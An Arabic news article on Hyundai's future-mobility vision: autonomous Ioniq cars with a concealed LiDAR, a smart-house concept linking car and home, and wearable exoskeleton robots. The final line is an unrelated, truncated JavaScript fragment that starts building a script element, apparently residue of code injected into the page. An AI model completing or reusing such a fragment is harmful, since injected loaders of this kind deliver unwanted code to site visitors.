هيونداي تكشف عن رؤيتها لمستقبل التنقل

كشفت شركة هيونداي عن رؤيتها لمستقبل التنقل، التي تعتقد فيها أن الجيل القادم من تقنيات التقارب من شأنه أن يربط السيارات بشؤون حياة المستهلكين ربطاً وثيقاً من خلال قيادة ذاتية ذكية، وحلول ذكية فائقة الاتصال، وابتكارات لتعزيز الصحة والتمتع بالعافية أثناء التنقل.

نماذج “أيونك” ذاتية القيادة تكشف النقاب عن تقنيات قيادة ذاتية متطورة

تقدّم هيونداي موتور عروضاً توضيحية مباشرة وتُجري استعراضات بتقنيات الواقع الافتراضي للتعريف بالقدرات التي تنطوي عليها أحدث تقنيات القيادة الذاتية التي تبتكرها. وينصبّ تركيز هيونداي موتور حالياً على تطوير تقنيات في القيادة الذاتية يمكن تسويقها في سيارات الإنتاج التجاري، بدلاً من التركيز على تطوير مركبات اختبارية. وترى الشركة أن السيارات ذاتية القيادة ستصبح متاحة في متناول الجميع بأسعار معقولة، ما يعني أن مزيداً من المستهلكين سوف يستمتعون بأحدث التطورات في مجال التنقل الآمن.

وقطعت هيونداي أشواطاً ناجحة في تطوير نظام تحديد المدى بالضوء أو الليزر (LiDAR)، واستطاعت إخفاءه عن الأعين في المصد الأمامي للسيارة “أيونك” ذاتية القيادة بدلاً من وضعه على السطح، حتى لا تبدو السيارة بمظهر غريب. وتسمح أحدث تقنيات هيونداي موتور للسيارة بالسير في الطريق وخوض أصعب حالات المناورة بأمان، حتى وسط حركة كثيفة للمشاة، والتعامل بدقة مع الإشارات الضوئية ولافتات المرور الإرشادية، والأشغال الإنشائية والحواجز والمطبات، فضلاً عن الكلاب والأطفال الصغار، وحتى التقاطعات الخالية من إشارات المرور.

نموذج “رؤية التنقل” يقارب بين قدرات الربط الفائق وتقنيات المنزل الذكي

تعرض هيونداي موتور، من خلال نموذجها المبتكر لرؤية مستقبل التنقل، المدى الذي يمكن الوصول إليه في تقنياتها المتطورة. ويستطيع نموذج “سمارت هاوس” للمنزل الذكي، بسهولة، أن يدمج السيارة في الحياة اليومية للمستهلكين، وأن “يطمس” الخط الفاصل بين وسيلة التنقل وأماكن المعيشة والعمل.

وتسعى رؤية هيونداي موتور إلى تمكين المستهلكين من الاستمرار في ممارسة حياتهم اليومية دون انقطاع حتى أثناء التنقل، باعتبار أن مزايا الراحة والملاءمة والاتصال في كل من السيارة والمنزل مندمجة في “مساحة واحدة”.

روبوتات قابلة للارتداء تتيح مستوى أرفع لحرية التنقل

أماطت شركة هيونداي موتور اللثام عن روبوتات قابلة للارتداء تعمل بالطاقة مهيّأة لإحداث ثورة في مستقبل التنقل الشخصي. وتكشف أحدث الابتكارات في مجال الهياكل الخارجية المساعدة المتقدمة، الخاصة بالأغراض الطبية واحتياجات العمل والحياة اليومية، عن طموح الشركة لتوفير دعم للركاب أثناء التنقل يتجاوز السيارة ويصاحبهم أينما كانوا ليضمن استمرار تمتعهم بالعافية. وتشتمل مجموعة الهياكل الخارجية القابلة للارتداء أنظمة تحكم في الحركة على متن السيارة لدعم المرضى الذين يعانون من إصابات في العمود الفقري السفلي، أو تقديم الدعم للمسنين في المشي من أجل حياة يومية أفضل. ويمكن لهيكل خارجي خاص بأماكن العمل أن يقدّم الدعم للجزء العلوي من الجسم ولمنطقة الحوض، من أجل وقاية العاملين في رفع الأغراض الثقيلة من إصابات الظهر.

var d=document;var s=d.createElement(‘script’);